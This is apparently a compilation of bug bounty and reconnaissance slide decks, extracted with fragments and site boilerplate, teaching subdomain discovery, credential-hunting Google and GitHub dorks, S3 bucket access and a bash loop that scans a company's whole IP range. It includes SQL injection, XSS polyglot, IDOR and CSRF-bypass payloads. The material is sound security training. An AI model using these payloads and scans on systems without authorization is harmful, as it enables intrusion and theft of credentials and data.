Sub-domains Discovery Cont.
• Google Dork
site:target.com –site www.target.com
• Online Resource:
– https://dnsdumpster.com/
– https://searchdns.netcraft.com/
– https://www.virustotal.com (Go to search and
type target.com)
– https://crt.sh/?q=%25paypal.com
(Use “%target.com”. )
Now We Have
WaybackURls
+
Subdomains
Don’t Stop Here
Find Sub-domains of Sub-domain
http://bf1-adxdb-001.data.bf1.yahoo.com/about.php
Some website have 5th and 6th level sub-domain

Find Subdomains of Subdomain
Tool: altdns (https://github.com/infosec-au/altdns)

Input : sub-domain list
Usage: ./altdns.py -i subdomains.txt -o
data_output -w words.txt -r -s output.txt
Find Subdomains of Subdomain
Tool: SubBrute
Usage:
./subbrute.py target.com > sudomains.txt
Then
./subbrute.py –t subdomains.txt
Now We Have
WaybackURls
+
Subdomains
+
Subdomains of Subdomains
Sub-domain Validation
Tool: EyeWitness (https://github.com/ChrisTruncer/EyeWitness)
Provide list of sub-domains and it will give you

report with screenshots of sub-domain
Usage: ./EyeWitness.py -f subdomains.txt

Sub-domain Validation
• Tool: Grab Them All (Mozilla addon)
Other sites on the same domain
• www.yougetsignal.com
Now We Have
WaybackURls
+
Subdomains
+
+
Other Sites on the same Domain
Target IP Range
• Url: https://whois.arin.net
• Search by Target IP
IP Range of Target Cont.
• Yahoo! owns a massive block of IP addresses
• From 98.136.0.0 - 98.139.255.255
• Which is 260,000 unique IP addresses

Got Huge IP Range
Real Case Study
• Patrik Fehrenbach (@ITSecurityguard)
Wrote a Bash script to download phpinfo.php

file (if found) from Yahoo! IP range
(98.136.0.0 - 98.139.255.255)
Real Case Study
• And Finally
http://nc10.n9323.mail.ne1.yahoo.com/phpinfo.php
Bash Script
#!/bin/bash
for ipa in 98.13{6..9}.{0..255}.{0..255}; do
wget -t 1 -T 5 http://${ipa}/phpinfo.php; done&
Only 3 lines of code

Takeaways
• When hacking, consider a company’s entire
infrastructure. I know that Patrik has employed
similar techniques to find some more.
(Eg. Many people keep Backup.rar)
• Additionally, you’ll notice there was 260,000

potential addresses here, which would have been
impossible to scan manually.
• When performing this type of testing,

automation is hugely important.
Now We Have
WaybackURls
+
Subdomains
+
+
+
IP Range
Find New Endpoints from JS Files
• Tools used
1. Burp Suite
2. InputScanner (Zscanner)
3. JS-Scan
(Tools Intro.)
• Burp Suite: Proxy
• Zscanner: A tool designed to scrape a list of

URLs. This tool will also scrape .js urls found
on each page
• JS-Scan: A tool designed to scrape a list of .js

files and extract urls
How to use these tools
together??
(Burp Suite)
• Run Spider tool on your target in Burp Suite
• Once the spider has finished right click on the host
and click "Copy Urls in this host“
(Zscanner)
• Once copied, paste them into urls.txt
• Put urls.txt file in the root of Zscanner
Eg. c/xampp/htdocs/zscanner/urls.txt
• Now open zscanner in browser
(Zscanner.)
• Click on “Begin Scanner”
• 4 files are outputted in the /outputs/ folder:
JS-output.txt, GET-output.txt, POSTHost-
output.txt, POSTData-output.txt
• Copy JS-output.txt file and put it in the root of
JS-Scan root folder
Eg. c/xampp/js-scan/JS-output.txt
(JS-Scan)
• Open JS-Scan in browser
(JS-Scan)
• Click on Run Scanner and you will see
something similar to this. That’s it.
Takeaways
• Endpoints extracted from JS files are more

vulnerable then Endpoints defined in
WebPages.
• Automated Scanners generally don’t scan

Endpoints defined in JS files.
• Developers & Testers don’t care about them.

Now We Have
WaybackURls
+
Subdomains
+
+
+
IP Range
+
New Endpoints From JS FIles
Technologies Used by Web
Technologies Used by Web
• Wappalizer (Mozilla Addon)
Amazon Web Services
AWS or S3 Buckets
Amazon Web Services
• AWS Simple Storage Service (often shortened
to S3) is used by companies that don’t want to
build and maintain their own storage
repositories
• By using Amazon Simple Storage Service, they
can store objects and files on a virtual server
instead of on physical racks
Amazon Web Services
• After the user has created their bucket, they
can start storing their source code,
certificates, passwords, content, databases
and other data.
Amazon Web Services
What if target is vulnerable
• You can get full access to S3 bucket
• You can download, upload and overwrite files.

How to find S3
Buckets?
Find S3 Buckets
• Google Dork
site: amazonaws.com inurl: yahoo
• Tool: S3 bucket finder

(Download: https://digi.ninja/projects/bucket_finder.php)
Find S3 Buckets
• Burp Suite can also Help
AWS
HACKING
AWS HACKING
• Install awscli in kali
• Interact with Bucket
• Find World Writable Directory.

Now We Have
WaybackURls
+
Subdomains
+
+
+
IP Range
+
New Endpoints From JS Files
+
S3 Buckets
Github Recon
What you can find on Github
• FTP Credentials
• Secret Keys [API_key, Aws_secret key, etc.]
• Internal credentials [Employee credentials]
• API Endpoints
• Domain Patterns
Github Recon
• Go to github and search
Eg.
- “target.com” “dev”
- “dev.target.com”
- “target.com” API_key
- “target.com” password
- “api.target.com”
Github Recon
Github Recon
• Google can also help
Dork:
site: “github.com” + “Target” + password
Github Recon
Tools are out to automate this
• Gitrob
• Git-all-secrets
• truffleHog
• Git-secrets
• Repo-supervisor
• Do it manually [Best way]
– All tools are available on github

Tool- truffleHog
• Usage:
truffleHog --regex --entropy=False https://github.com/dxa4481/truffleHog.git
Content Discovery
Content Discovery
• Google is your friend
• Use Google Dork to find:-
- File Extensions
- Parameters
- Login Page
- Sometimes Directory Structure
- Important Stuff
Content Discovery
• I often use Google Dork to find files with
specific extension which also reveal
technology used by Target.
• Google Dork:
-site:target.com filetype:php
- site:target.com filetype:aspx
- site:target.com filetype:swf (Shockwave Flash)
- site:target.com filetype:wsdl
Content Discovery
• Find Parameter
• Google Dork:
- site: target.com inurl:.php?id=
- site: target.com inurl:.php?user=
- site: target.com inurl:.php?book=
Content Discovery
• Find Login Page
• Google Dork
- site: target.com inurl:login.php
- site: target.com intext: “login”
- site: target.com inurl:portal.php
- site: target.com inurl:register.php
(Note: if site has register page, there are chances

that site also have login page)
Content Discovery
• Find Directory Structure
• Google Dork:
-site: target.com intext: “index of /”
Content Discovery
• Find important Stuff
• Google Dork:
-site: target.com filetype:txt
- site: target.com inurl:.php.txt
-site: target.com ext:txt
In most cases you will find robot.txt
But sometimes you will find really juicy stuff
Content Discovery
• I found code in txt file which includes FTP
credentials, SMTP credentials
Content Discovery
• Even some big names in IT Field.
Content Discovery
• Tools:
– GoBuster [https://github.com/OJ/gobuster]
Use:
gobuster –w wordlist.txt –u http://trgt.com
– Dirbuster
Thank You
BUG BOUNTY WORKSHOP
FUNSHOP
➔ Intro
➔ Bug Bounty Definition
➔ How to select a target
➔ Passive Recon Techniques
AGENDA ➔ Hacking with Burp Suite
➔ Importance of understanding an application flow
➔ Better Bug Bounty Report
➔ Keep up with all the new trends
➔ Live Burp Suite Session
➔ Recap | Wrapping up
Intro
#whoami
❖ Prateek Tiwari - @prateek_0490

❖ Security Lead @ Zomato
❖ Security Consultant, Occasional Bug Bounty Hunter
❖ Email: prateek0490@gmail.com
Hey you! What’s Bug Bounty?
What’s Bug Bounty?
❏ Bug Bounty is a reward offered to individuals

who identifies and report bugs or security
vulnerabilities in a computer program/system or
software.
❏ The reward could be in any form - from goodies
to hard cash or just acknowledgement.
How to select a target?
How to select a target?
Assets in scope:
● Priority to wildcard {*.example.com}

● Mobile Apps
Paying attention to out of scope / exclusions list:
● XSS
● CSRF
● Subdomain Takeovers
Meh “really? Do you even care about Security ”

Diving deep into the target, Passive..sh Recon
Diving deep into the target using passive..sh Recon
Find all the **ASSETS** that belongs to that organisation. Assets?
○ Domains?
○ Subdomains?
○ 3rd Party Services used by Organisation (GitHub, Jira, Trello, Jenkins, GitLab, etc...)
○ IP Ranges?
○ iOS / Android Apps?
○ Doesn’t ends [n number of assets] ..….

Subdomains | Asset(s) Identification
● Subfinder [https://github.com/subfinder/subfinder]
● VirusTotal [https://www.virustotal.com/#/domain/domain.com]
● Certificate Transparency [https://crt.sh/?q=%.domain.com]
● Censys [https://www.censys.io]
● Google - site:example.com -www [Other Search Engines - Bing, DuckDuckGo, Yahoo]
● Google Certificate Transparency
[https://transparencyreport.google.com/https/certificates?hl=en]
● Facebook Certificate Transparency Monitoring
[https://developers.facebook.com/tools/ct]
● CSP Headers? Anyone? That’s interesting isn’t it? Well that has given me couple of
criticals and a nice payouts. Never miss!
● GitHub, Gist, Gitlab, Trello, Jira, etc…
CSP Headers
gist.github.com
gist.github.com
Cost of Human Errors :(

Trello, Jira, Gitlab ...
Even though if an organization's Jira instance has an auth, administrators set up "public" projects, they
forget “public” means public for everyone. This could sometime give you keys to kingdom.
Trello, Jira, Gitlab ...
Thanks Ed :)
fofa.so - chinese version of shodan
shodan.io
IP Ranges
https://bgp.he.net/search?search%5Bsearch%5D=
Smule&commit=Search
IP Ranges
https://whois.arin.net/ui/query.do
IP Ranges
Sir, I’ve found the IP Space now what?
IP Range - now what?
● Fire NMap and run NSE Scripts on those discovered IP Ranges
● Perform content discovery (file/folder bruteforcing) on every discovered asset
○ BurpSuite
○ Dirsearch, Dirbuster
○ Wfuzz
Oh the mobile apps are in scope, what should I look
for?
Did you know? You can find leakage of sensitive data in mobile apps without even
installing them on your phone. Howwww?
for?
Short Cut:
for?
Long Route:
❖ Download the apk, you can do it from

https://apkpure.com/
❖ Upload the apk at https://apkscan.nviso.be/, run
the Scan and wait for the results.
for?
VIRUSTOTAL
Hacking with BurpSuite
Setting the right Scope
Keeping an eye on these

issues list, always handy and
helps a lot!
BURP SPIDER
● Turn off Passive Scanning

● Set Forms to auto submit
● Set scope to advanced control and use a target name instead of regex
(something like zomato instead of .zomato.com or .*\.zomato\.com$), you will
be surprised to see the results and after effects of it 😲
● Browse all URLs, make all requests POST/GET/PUT whatever, then spider all
hosts recursively
● Profit (More Targets)!
Will cover up in Live Session

Did you know? You don’t always need an automated Script to demonstrate the
impact of any data leak [PIIs].
Intruder for the win!

Using “Repeater tab” to find:
● XSS
● SQLi
● Privilege Escalation
● IDOR(s)
● More Bugs
● Using “Repeater tab” to find XSS, SQLi, IDOR(s), Privilege Escalation
● Catch a Request which accepts user input and throw it into a repeater tab.
● Start Fuzzing the parameters.
SQLi(s)
id=1’
id=1‘’
id=1’-sleep(10)-’
id=1"
id=1"“
id=1"-sleep(10)-”
id=1/sleep(10)
● IDOR(s) are always easy, playing with the id parameters.
Manipulate the create requests.
● id=1 > id=2 > Easy Money

Easy Privilege Escalation with Repeater
● Have 2 different user accounts, one low privileged user and other one with some level
of permissions.
● Catch the request in BURPSUITE, throw them into a “Repeater tab” replace the
cookies of a high level privileged user with low level privileged user, see if it’s a
success!
JS for the WIN
Feeding these in tools:
https://github.com/GerbenJavado/LinkFinder
Feeding these in tool
python linkfinder.py -i /Desktop/z.burp -b -o cli
Shooting in Dark? Understand the application flow to
find bugs
find more bugs
You’re doing it wrong -
● If you haven’t spent good amount of time to study the target.

● If you haven’t understood the privileges and functionalities of a user.
● If you haven’t checked their available docs, neither gathered all the information about the
target.
What happens next if you haven’t done your homework?

find more bugs
What happens next if you haven’t done your homework?
find more bugs
Researchers have a tendency to jump on the target application and start attacking
them. What happens then?
YOU END UP GETTING DUPE

find more bugs
find more bugs
If you’ve invested good amount of time on a target, you will:
● Get better understanding about how the target app works.

● Know what parameters are usually being used by the target app.
● Understand the functionalities & privileges of the user’s in target app.
● Be able to identify what parameters to use when you discover tons of endpoints in JS files.
Found an internal
endpoint in JS and
immediately knew
what parameters to
use based on my past
research
find more bugs
find more bugs
Read the Docs = Get a BUG?
find more bugs
Few Nice Reads:
● Static Analysis of Client-Side JavaScript for pen testers and bug bounty
hunters -
https://blog.appsecco.com/static-analysis-of-client-side-javascript-for-pen-test
ers-and-bug-bounty-hunters-f1cb1a5d5288
● Discovering hidden endpoints using LinkFinder -
https://gerbenjavado.com/discovering-hidden-content-using-linkfinder/
● Getting started in Bug Bounty -
https://medium.com/@ehsahil/getting-started-in-bug-bounty-7052da28445a
Better Bug Bounty Report
better bug reports

better bug reports
better relationship
better bug reports
better relationship
better bounties
Sharing from other side of the fence
What you shouldn’t do?
● What you shouldn’t do?
● Follow up after 5 mins of report submission
● Bounty Plz!
● Contacting someone from Security Team on Twitter asking for an update.

The Wrong Way,
How not to submit a report?

The Right Way -
● Introduction
● Details
● Steps to reproduce (POC)
● Impact
Before reporting, always think from organization’s point of view and think from the other side -
Understand companies nature of business
Seeing an image of other users on a company like Zomato? Seriously are you kidding me? That’s not sensitive at all -
Closing it as N/A
VS
Viewing others uploaded images on an Image Sharing Site

Mantra to build a strong relationship
with Security team
● Be Professional with your

communication
● While Submitting a report, provide
detailed report with clear steps to
reproduce
● Don’t bug or spam them, prepare a
schedule for follow up’s
● Don’t do this - send a LinkedIn invite, or
DM on Twitter asking for an update
Keeping up with new trends
….Staying on top of new hacking trends

can help you earn more bounties.
Sir, what should we do to keep up with all the new trends?
#BugBounty #BugBountyTip #TogetherWeHitHarder
Subscribe to topics
like Information
Security, Bug Bounty,
Infosec, etc..
IT’S ALL ABOUT SOURCES

Hacktivity! https://hackerone.com/hacktivity
ZERO DAILY!
https://hackerone.com/zerodaily
Profit!! Time to earn bounties...
LIVE BURP SUITE SESSION
#bugbountytip
#bugbountytip
#bugbountytip
#bugbountytip
Waybackurls
Scrape URLs using - https://github.com/tomnomnom/waybackurls/
root@pt:~/tools/recon/waybackurl$ cat domains.txt | waybackurls > urls
root@pt:~/tools/recon/waybackurl$ cat urls | grep ".js"

#bugbountytip
Bringing few more #tips:
● Search for developers, QA on Stackoverflow
● Always run wfuzz / dirsearch on all subdomain(s) found to discover more content, more
bounties?
● Earlier this year, I got a bounty for redacted.corp.com/documentation and found an excel
spreadsheet of the database, eehhh, easy money 😳
● Can’t CSRF delete method? Few frameworks / API(s) allows to “fake” methods by additional
parameters, ex:
○ Adding a parameter such as: method=delete | _method=delete -> API will parse it as a
Delete request.
#bugbountytip
Sir, please one more! Okay, take this ezzy money!
● Always check if Strict transport security is enforced? Many a times, hxxp://redacted.com is not
redirected to https, many companies are interested to hear about “Weak Login function over HTTP”.
Recap | Let’s Roll It Back
● Dive deep into the target using Passive techniques:

○ Virustotal
○ crt.sh
○ censys.io
○ https://transparencyreport.google.com/https/certificates?hl=en
○ https://developers.facebook.com/tools/ct
○ CSP Headers
○ Don't forget the third party services, those are so helpful and always helps you to learn more about
the target
● Shodan.io and fofa.so will give you a lot of juicy stuffs.
● Always give a shot at Mobile Apps - use apkscan.nviso.be | virustotal …
● Submit better reports, think from the other side about the impact before submitting.
● Keeping up with what’s happening around will help you earn more bounties.
Thank You
Prateek Tiwari
prateek0490@gmail.com
@prateek_0490
linkedin.com/in/prateek-tiwari-867b905a/
facebook.com/prateek0490
29/11/17
Journey to the top
on
The untold tales of struggle and pain
CHCON 2017
29/11/17
o Ahmad Ashraff @yappare
o Origin : Malaysia About Me
o Education : Bachelor of Chemical Engineering
o Experience : +7 years in ITSec industry
o Current : Security Consultant at Aura Information
Security
o Hobbies : Backpacking, Watching Animes
CHCON 2017
CHCON 2017 29/11/17
About the Presentation
29/11/17
o What is bug bounty program
o Why I started bug hunting
o Problems and troubles – How I encountered them
o Tips and Tricks
o Hope people stop asking me “How many bugs did you found last weekend?”
CHCON 2017
29/11/17
What is bug bounty program?
A reward offered to a person who identifies an error or

vulnerability in a computer program or system.
https://en.oxforddictionaries.com/definition/bug_bounty
CHCON 2017
How companies manage bug bounty programs
29/11/17
Self-manage via 3rd Managed by 3rd
Own programs
party platform platform
•Own platform •Standard set by own •Platform’s analyst

•Mature in process orgs act as a middle
•Great pool of •Manage by own team person
budgets •Risk/Reward decided •Most of orgs follow
•Expert security by themselves the standard
engineers •Miscommunication provided
can happen •Platform analysts
have knowledge
CHCON 2017
Why I Started Bug Bounty?
29/11/17
Car/Transport Kids
Event
Married Study Loan
House
Gadgets
Travelling
Hobbies
Parents
CHCON 2017
$%#^#&
that might
~$850 paid per month happen
29/11/17
3rd August 2012
4 months later
CHCON 2017
1 XSS – Found in less than a day = $500
29/11/17
Monthly paid = ~$850
1 XSS in Paypal > Half of monthly paid
CHCON 2017
29/11/17
Study Loans
Personal Loans
CHCON 2017
Cars
Credit Cards
29/11/17
It is not just about money
• More knowledge/sharing from other experts

• New techniques
• Better profile
• I’m still at a beginner level
CHCON 2017
Hi folks, meet…
CHCON 2017 29/11/17

29/11/17
Joined Tesla’s
security team
Security
Joined at Teslaas
BugCrowd
Technical Operation
Head of Trust and Security at Bugcrowd
CHCON 2017
Doing windows server configuration review.
29/11/17
2015. 1st place. Looks good
Early 2016. Still hold the title.
CHCON 2017
Oct 2016 . Started to be a busy
guy. Lost from the radar.
29/11/17
A wizard
Normal human
being
Talented full-time
bughunter from UK
CHCON 2017
Anonymous
Attack-dev
https://bugcrowd.com/leaderboard
Public VS Private Programs in Bugcrowd
29/11/17
• Can participate once • Two types, ongoing & flex
registered (on-demand)
• Kudos/Rewards • Kudos/Rewards
• Tested multiple times • Web,mobile,hardware,API,
• Orgs ready to go to public IOT
• Web,mobile,hardware,API, • Tested few times or fresh
IOT • Orgs want to be tested by
trusted users
Public
Private
CHCON 2017
Problems..
CHCON 2017 29/11/17

Problems
29/11/17
Equipment and Tools
CHCON 2017
Problems
29/11/17
• Tough competition. Experts everywhere
CHCON 2017
• Fast and Furious. Really fast. Need to avoid duplicate
submission
29/11/17
5 MINUTES
30 MINUTES
CHCON 2017
55 MINUTES
Problems
29/11/17
Most programs start at UTC time zone
At work. Doing host review

Fuzzing Recon
CHCON 2017
Me in NZST.
29/11/17
Able to optimize my free times and
use ~ 10 hours per week
There is no magic, they are just the

forgotten basics
CHCON 2017
CHCON 2017 29/11/17
Tips 1 – Focus on less participants
29/11/17
Mobile Applications
• Windows < iOS < Android
• Cert Pinning
Iot/Device
• Specific device need to be purchased
• Need knowledge, tools Preparing
is a mess
Scripts/Binary
CHCON 2017
• Dev knowledge, binary exploitation
• Fuzzing technique
Tips 1 – Focus on less participants
29/11/17
Wide targets -
Reverse recon automated+manual
Old or No Reward Complex setup - AWS account,

premium, developer, OS
programs dependent
CHCON 2017
29/11/17
Reverse recon
IF the provided in scope is/are production sites
• Check on their dev/staging/qa environment

• Check on their Github Good in
• Check on their old sites through wayback archive discovery
path/modules/
features
IF the provided in scope is/are staging/testing/dev/qa sites
CHCON 2017
• Check on their production environment
• Check on their old sites of the production through wayback archive
• Check on their support/issues website
29/11/17
Can do this back to back
Automated Manually
Wide targets
- Google/Bing/Yahoo
*.blabla.com - Subdomain scanner
- Wayback archive
All BlaBla’s public - CMS scanner
- Github
websites - Known vulnerabilities - Support
Repeat on other subdomains,

countries
Profit Submit Save all the writeups
CHCON 2017
• Threat Crowd. • HackerTarget
29/11/17
• Certificate Search • Google
(crt.sh) Transparency
• Censys Report
aquatone-discover • Shodan • DNSDB
• Riddler • VirusTotal
• PassiveTotal • Dictionary
• Netcraft
AQUATONE
aquatone-takeover Find misconfigured DNS setup
aquatone-scan Port scan on common web server ports
CHCON 2017
Access the discovered web ports and
aquatone-gather provide headers information plus
screenshot
https://github.com/michenriksen/aquatone
discovery
29/11/17
scanning
CHCON 2017
gathering
CHCON 2017 29/11/17
Tips 2 – Risk Matrix Used
29/11/17
P1 – 40 points + $1500
P2 – 20 points + $900
P3 – 10 points + $300
P4 – 10 points + $100
Bugcrowd’s VRT is a resource outlining Bugcrowd’s
P5 – 0 points + $0 baseline priority rating, including certain edge cases, for
vulnerabilities that we often see.
CHCON 2017
29/11/17
Cool
bugs
Not so-
cool
bugs
Not so-
cool
bugs
CHCON 2017
Cool
bugs
29/11/17
Still a P3 risk.
Still received the same points
CHCON 2017
29/11/17
CHCON 2017
Still received the points and rewards
Tips 3 – Do Not Stop at One Attack
29/11/17
http://www.brokensites.com/admin/login.php?redirect_url=/dashboard
P4 = 5 + $100
P3 = 10 + $300
Open
Lack of bruteforce
Redirect?
protection?
XSS?
Cleartext? Default/Weak P3 = 10 + $300
Creds? SSRF?
P4 = 5 + $100
P3 = 10 + $300 P1 = 40 + $1500
RCE?
P1 = 40 + $1500
CHCON 2017
Total points : 120
Total rewards: $4100
11/29/17
Same parameter, same program, different time of
submission, different attacks, 1 dupe, 1 valid. J
CHCON 2017
CHCON 2017 29/11/17
Tips 4 – Mobile View
29/11/17
• Redirected to main page
• Forbidden
• No Access
m.website.com
mobile.website.com
touch.website.com
www.website.com/m/
www.website.com/mobile
• Redirected to mobile
page
• New session cookies?
• More features
CHCON 2017
• More user inputs
• Lack of security checks
CHCON 2017 29/11/17
Tips 5 – Be Friend with JS Files
29/11/17
Time consuming, but it is worth your effort
• Locate another .js files

• Locate path/files that not in
crawled results
• Locate admin’s features/action
CHCON 2017
• Hardcoded credentials
• Backup/Github/Dev sites
• Method of encryption
29/11/17
View source > find .js > analyse
CHCON 2017
https://bountysite.com/admin/dashboard?redirect=/
29/11/17
Check on login.js
https://bountysite.com/admin/dashboard/js/login.js
Check
on
another
https://bountysite.com/admin/dashboard/photography/loginx
JS
CHCON 2017
P1 = 40 + $1000
Tips X – Out of Scope
29/11/17
Some of the programs have a number of out of scope issues that they don’t want to see.
CHCON 2017
I don’t participate.
List of tools
29/11/17
?
• Burp Suite Pro
• Recon tools
Aquatone - https://github.com/michenriksen/aquatone
Spiderfoot - http://www.spiderfoot.net/
Enumall - https://github.com/jhaddix/domain
Sublist3r - https://github.com/aboul3la/Sublist3r
• Scanning tools
WPScan - https://wpscan.org/
Droopescan - https://github.com/droope/droopescan
SQLMap - http://sqlmap.org/
OXML_XXE- https://github.com/BuffaloWill/oxml_xxe
• JS Parser
CHCON 2017
https://github.com/zseano/JS-Scan
https://github.com/nahamsec/JSParser
11/29/17
Thank you to
• Christchurch Conference 2017
• Aura Information Security
• BugCrowd
• Bug hunters all over the world
• BurpSuite Pro
CHCON 2017

1ndianl33t Recon v1 PDF

Uploaded by

Document Information

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

1ndianl33t Recon v1 PDF

Uploaded by

Copyright:

Available Formats

How To Shot Web

(Better hacking in 2015)

Step 1: Started with my bug hunting methodology

Topics? BB philosophy shifts, discovery

nmap -sS -A -PN -p- --script=http-title dontscanme.bro

^ syn scan, OS + service fingerprint, no ping, all ports,

GET http://www.acme.com - 200

● 250+ bounty programs

● 250+ bounty programs

$cat test_target_json.txt | grep redirect

● User/pass discrepancy flaw

● Failure to invalidate old cookies

For time sensitive testing the 80/20 rule

“ onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//

Multi-context, filter bypass based polyglot payload #3 (Mathias Karlsson)

Observations Customizable Themes & Profiles via CSS

Event or meeting names

Imported from a 3rd party (think Facebook integration)

JSON POST Values (check returning content type)

File Upload names

Uploaded files (swf, HTML, ++)

Custom Error pages

fake params - ?realparam=1&foo=bar’+alert(/XSS/)+’

Login and Forgot password forms

onload, allowedDomain, movieplayer, xmlPath, eventhandler, callback (more on OWASP page)

Common Injection Strings:

There exist some SQLi polyglots, i.e;

SLEEP(1) /*‘ or SLEEP(1) or ‘“ or SLEEP(1) or “*/

‘%2Bbenchmark(3200,SHA1(1))%2B’ Currency Values

SQLMap is king! sorting parameters (i.e order, sort, etc)

JSON and XML values

REST based Services

POSTGRESQL PentestMonkey's Postgres SQLi Cheatsheet

Others Access SQLi Cheatsheet

A file upload functions need a lot of protections to be adequately secure.

● content type spoofing

As referenced file polyglots can be used

See @dan_crowley ‘s talk: http://goo.

and @angealbertini research: corkami.

Common blacklist bypasses: continue=

Burps CSRF PoC is fast and easy for

● Remove CSRF token from request

Check this out...

Step 2: Create a template...

1. Parse burp log file

Add / Upload file Password change

Email change Transfer Money /

Delete File Profile edit

Testing user priv:

1. admin has power

customer analytics view

https://github.com/Quitten/Autorize any view with PII

Find any and all UIDs

Everything from the CSRF Table, trying cross account attacks

Sub: UIDs, user hashes, or emails

Images that are non-public

Private Files (pdfs, ++)

Shipping info & Purchase Orders

Sending / Deleting messages

● Sensitive images transported over HTTP

● substituting hashed parameters

Its common to see mobile apps not applying

Phone system logs (avail to all apps)

SLEEP(1) /‘ or SLEEP(1) or ‘“ or SLEEP(1) or “/